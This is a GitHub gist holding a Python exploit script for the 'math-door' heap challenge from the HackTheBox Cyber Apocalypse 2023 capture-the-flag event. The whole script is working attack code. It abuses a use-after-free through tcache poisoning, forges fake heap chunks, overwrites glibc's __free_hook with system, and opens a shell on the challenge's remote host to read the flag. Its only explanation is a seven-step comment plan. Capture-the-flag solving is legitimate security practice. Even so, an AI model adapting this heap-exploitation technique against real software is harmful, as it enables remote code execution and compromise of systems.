Created
March 23, 2023 13:17
-
-
Save k1R4/4ac27d096de773f30eec307783e03561 to your computer and use it in GitHub Desktop.
math-door - HackTheBox CyberApocalypse 2023
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# flake8: noqa | |
#!/usr/bin/env python3 | |
from dn3 import * | |
exe = ELF("math-door") | |
libc = ELF("libc.so.6") | |
ctx.binary = exe | |
ctx.terminal = "tmux new-window".split() | |
#ctx.log = 0 | |
ctx.aslr = False | |
global io | |
breakpoints = ''' | |
break *main+48 | |
'''+"continue\n"*103 | |
host, port = "68.183.37.122",30393 | |
if len(sys.argv) > 1 and sys.argv[1] == "-r": | |
io = remote(host,port) | |
elif len(sys.argv) > 1 and sys.argv[1] == "-ng": | |
io = process(exe.path) | |
else: | |
io = gdb(exe.path, gdbscript=breakpoints) | |
DeathNot3(io, libc=libc) | |
def alloc(): | |
sla(": \n", 1) | |
return int(rl().split()[-1][:-1]) | |
def free(idx): | |
sla(": \n", 2) | |
sla(":\n", idx) | |
def hax(idx,payload): | |
sla(": \n", 3) | |
sla(":\n", idx) | |
sa(":\n", payload) | |
# 1) overwrite tcache cookie to abuse uaf | |
# 2) overwrite chunk header to fake unsorted chunk and get libc pointer | |
# 3) get pointer to __free_hook and write fake header for __free_hook | |
# 4) write unsorted size and craft 2 fake chunks below __free_hook to pass checks | |
# 5) overwrite top chunk size to pass check | |
# 6) finally free __free_hook chunk to cause libc pointer to be placed on __free_hook | |
# 7) offset to system and free to get shell | |
a = alloc() | |
for i in range(1,36): | |
alloc() | |
free(8) | |
free(a) | |
hax(a,flat([0,1337])) | |
free(a) | |
b = alloc() | |
hax(b,p64(0xfffffffffffffff0)) | |
c = alloc() | |
unsorted_sz = alloc() | |
free(3) | |
hax(unsorted_sz,flat([0,0x421])) | |
free(9) | |
free(6) | |
hax(6,flat([0,1337])) | |
free(6) | |
d = alloc() | |
hax(d,p64(0xfffffffffffffd30)) | |
e = alloc() | |
tcache = alloc() | |
free(a) | |
for i in range(2): | |
alloc() | |
hax(3,flat([0,1337])) | |
free(3) | |
free(4) | |
hax(tcache,p64(0xffffffffffffff80)) | |
hax(a, p64(0x2258-0x3f0)) #0xffffffffffffff90 | |
alloc() | |
sz = alloc() | |
hax(sz,p64(0x21)) | |
for i in range(11,17): | |
free(i) | |
free(10) | |
hax(tcache,p64(0xfffffffffffffec0)) | |
alloc() | |
hax(tcache,p64(0x8)) | |
target = alloc() | |
hax(10,flat([0,1337])) | |
free(10) | |
hax(tcache,p64(0x330)) | |
top = alloc() | |
hax(top,flat([0xffff7ffffffffff1,0xffff7ffffffffff1])) | |
hax(10,flat([0,1337])) | |
free(10) | |
hax(tcache,p64(0xfffffffffffffec0)) | |
alloc() | |
hax(tcache,p64(0x418)) | |
fake = alloc() | |
hax(fake,flat([0,0x21])) | |
hax(10,flat([0,1337])) | |
free(10) | |
hax(tcache,p64(0xfffffffffffffec0)) | |
alloc() | |
hax(tcache,flat([0x438,0])) | |
fake = alloc() | |
hax(fake,flat([0,0x21])) | |
hax(10,flat([0,1337])) | |
free(10) | |
hax(tcache,p64(0xfffffffffffffec0)) | |
alloc() | |
hax(tcache,p64(0xfffffffffffffff0)) | |
target_sz = alloc() | |
hax(target_sz,flat([0x0,0x0,0x400])) | |
free(target) | |
hax(target,flat([0,0xffffffffffe656b0])) | |
hax(30,p64(upk("/bin/sh\x00"))) | |
free(30) | |
msleep(10) | |
sl("cat flag*") | |
shell() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment